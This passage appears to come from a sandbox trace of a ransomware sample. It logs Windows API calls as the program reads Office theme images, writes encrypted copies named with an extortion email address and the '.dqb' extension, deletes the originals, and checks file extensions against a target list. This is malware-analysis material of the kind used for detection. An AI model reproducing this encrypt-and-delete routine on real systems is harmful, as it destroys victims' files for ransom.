hFile=0x1dc, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.239] SetEndOfFile (hFile=0x1dc) returned 1 [0043.240] CloseHandle (hObject=0x1dc) returned 1 [0043.240] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.240] SetEndOfFile (hFile=0x1a8) returned 1 [0043.241] CloseHandle (hObject=0x1a8) returned 1 [0043.241] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.241] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png")) returned 1 [0043.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0043.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0043.241] lstrlenW (lpString=".doc") returned 4 [0043.241] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.241] lstrlenW (lpString=".docx") returned 5 [0043.241] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.241] lstrlenW (lpString=".pdf") returned 4 [0043.241] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.241] lstrlenW (lpString=".xls") returned 4 [0043.241] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.241] lstrlenW (lpString=".xlsx") returned 5 [0043.241] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.241] lstrlenW (lpString=".ppt") returned 4 [0043.241] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0043.241] lstrlenW (lpString=".zip") returned 4 [0043.241] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.241] lstrlenW (lpString=".rar") returned 4 [0043.242] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.242] lstrlenW (lpString=".bz2") returned 4 [0043.242] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.242] lstrlenW (lpString=".7z") returned 3 [0043.242] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0043.242] lstrlenW (lpString=".dbf") returned 4 [0043.242] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0043.242] lstrlenW (lpString=".1cd") returned 4 [0043.242] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0043.242] lstrlenW (lpString=".jpg") returned 4 [0043.242] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0043.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0043.242] lstrlenW (lpString=".doc") returned 4 [0043.242] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.242] lstrlenW (lpString=".docx") returned 5 [0043.242] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.242] lstrlenW (lpString=".pdf") returned 4 [0043.242] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.242] lstrlenW (lpString=".xls") returned 4 [0043.242] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.242] lstrlenW (lpString=".xlsx") returned 5 [0043.242] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.242] lstrlenW (lpString=".ppt") returned 4 [0043.242] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0043.242] lstrlenW (lpString=".zip") returned 4 [0043.242] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.242] lstrlenW (lpString=".rar") returned 4 [0043.242] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.242] lstrlenW (lpString=".bz2") returned 4 [0043.242] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.243] lstrlenW (lpString=".7z") returned 3 [0043.243] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0043.243] lstrlenW (lpString=".dbf") returned 4 [0043.243] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0043.243] lstrlenW (lpString=".1cd") returned 4 [0043.243] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0043.243] lstrlenW (lpString=".jpg") returned 4 [0043.243] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.243] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0043.243] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0043.243] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0043.243] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=2722) returned 1 [0043.243] CloseHandle (hObject=0x1a8) returned 1 [0043.243] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif")) returned 0x20 [0043.243] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.244] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0043.244] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.244] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.244] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0043.245] GetLastError () returned 0x0 [0043.245] ReadFile (in: hFile=0x1a8, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0xaa2, lpOverlapped=0x0) returned 1 [0043.246] WriteFile (in: hFile=0x1dc, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xab0, lpOverlapped=0x0) returned 1 [0043.247] ReadFile (in: hFile=0x1a8, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.247] WriteFile (in: hFile=0x1dc, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.247] SetEndOfFile (hFile=0x1dc) returned 1 [0043.247] CloseHandle (hObject=0x1dc) returned 1 [0043.248] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.248] SetEndOfFile (hFile=0x1a8) returned 1 [0043.248] CloseHandle (hObject=0x1a8) returned 1 [0043.248] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.249] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif")) returned 1 [0043.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0043.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0043.249] lstrlenW (lpString=".doc") returned 4 [0043.249] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.249] lstrlenW (lpString=".docx") returned 5 [0043.249] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.249] lstrlenW (lpString=".pdf") returned 4 [0043.249] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.249] lstrlenW (lpString=".xls") returned 4 [0043.249] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.249] lstrlenW (lpString=".xlsx") returned 5 [0043.249] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.249] lstrlenW (lpString=".ppt") returned 4 [0043.249] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0043.249] lstrlenW (lpString=".zip") returned 4 [0043.249] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.249] lstrlenW (lpString=".rar") returned 4 [0043.249] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.249] lstrlenW (lpString=".bz2") returned 4 [0043.249] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.249] lstrlenW (lpString=".7z") returned 3 [0043.249] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0043.250] lstrlenW (lpString=".dbf") returned 4 [0043.250] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0043.250] lstrlenW (lpString=".1cd") returned 4 [0043.250] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0043.250] lstrlenW (lpString=".jpg") returned 4 [0043.250] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0043.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0043.250] lstrlenW (lpString=".doc") returned 4 [0043.250] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.250] lstrlenW (lpString=".docx") returned 5 [0043.250] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.250] lstrlenW (lpString=".pdf") returned 4 [0043.250] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.250] lstrlenW (lpString=".xls") returned 4 [0043.250] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.250] lstrlenW (lpString=".xlsx") returned 5 [0043.250] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.250] lstrlenW (lpString=".ppt") returned 4 [0043.250] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0043.250] lstrlenW (lpString=".zip") returned 4 [0043.250] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.250] lstrlenW (lpString=".rar") returned 4 [0043.250] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.250] lstrlenW (lpString=".bz2") returned 4 [0043.250] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.250] lstrlenW (lpString=".7z") returned 3 [0043.250] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0043.250] lstrlenW (lpString=".dbf") returned 4 [0043.250] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0043.250] lstrlenW (lpString=".1cd") returned 4 [0043.251] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0043.251] lstrlenW (lpString=".jpg") returned 4 [0043.251] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.251] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0043.251] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.251] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0043.252] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=43276) returned 1 [0043.252] CloseHandle (hObject=0x1a8) returned 1 [0043.252] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png")) returned 0x20 [0043.252] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.252] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0043.252] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.252] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.252] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0043.252] GetLastError () returned 0x0 [0043.252] ReadFile (in: hFile=0x1a8, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0xa90c, lpOverlapped=0x0) returned 1 [0043.254] WriteFile (in: hFile=0x1dc, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xa910, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xa910, lpOverlapped=0x0) returned 1 [0043.255] ReadFile (in: hFile=0x1a8, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.255] WriteFile (in: hFile=0x1dc, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.256] SetEndOfFile (hFile=0x1dc) returned 1 [0043.256] CloseHandle (hObject=0x1dc) returned 1 [0043.256] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.256] SetEndOfFile (hFile=0x1a8) returned 1 [0043.257] CloseHandle (hObject=0x1a8) returned 1 [0043.257] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.257] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png")) returned 1 [0043.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0043.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0043.257] lstrlenW (lpString=".doc") returned 4 [0043.257] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.257] lstrlenW (lpString=".docx") returned 5 [0043.257] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.257] lstrlenW (lpString=".pdf") returned 4 [0043.258] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.258] lstrlenW (lpString=".xls") returned 4 [0043.258] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.258] lstrlenW (lpString=".xlsx") returned 5 [0043.258] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.258] lstrlenW (lpString=".ppt") returned 4 [0043.258] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0043.258] lstrlenW (lpString=".zip") returned 4 [0043.258] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.258] lstrlenW (lpString=".rar") returned 4 [0043.258] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.258] lstrlenW (lpString=".bz2") returned 4 [0043.258] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.258] lstrlenW (lpString=".7z") returned 3 [0043.258] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0043.258] lstrlenW (lpString=".dbf") returned 4 [0043.258] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0043.258] lstrlenW (lpString=".1cd") returned 4 [0043.258] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0043.258] lstrlenW (lpString=".jpg") returned 4 [0043.258] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0043.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0043.258] lstrlenW (lpString=".doc") returned 4 [0043.258] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.258] lstrlenW (lpString=".docx") returned 5 [0043.258] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.258] lstrlenW (lpString=".pdf") returned 4 [0043.258] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.258] lstrlenW (lpString=".xls") returned 4 [0043.259] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.259] lstrlenW (lpString=".xlsx") returned 5 [0043.259] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.259] lstrlenW (lpString=".ppt") returned 4 [0043.259] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0043.259] lstrlenW (lpString=".zip") returned 4 [0043.259] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.259] lstrlenW (lpString=".rar") returned 4 [0043.259] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.259] lstrlenW (lpString=".bz2") returned 4 [0043.259] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.259] lstrlenW (lpString=".7z") returned 3 [0043.259] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0043.259] lstrlenW (lpString=".dbf") returned 4 [0043.259] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0043.259] lstrlenW (lpString=".1cd") returned 4 [0043.259] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0043.259] lstrlenW (lpString=".jpg") returned 4 [0043.259] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.259] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0043.259] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0043.259] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0043.260] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=945) returned 1 [0043.260] CloseHandle (hObject=0x1a8) returned 1 [0043.260] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif")) returned 0x20 [0043.260] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.260] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0043.260] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.260] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.260] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0043.262] GetLastError () returned 0x0 [0043.262] ReadFile (in: hFile=0x1a8, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x3b1, lpOverlapped=0x0) returned 1 [0043.263] WriteFile (in: hFile=0x1dc, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x3c0, lpOverlapped=0x0) returned 1 [0043.264] ReadFile (in: hFile=0x1a8, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: 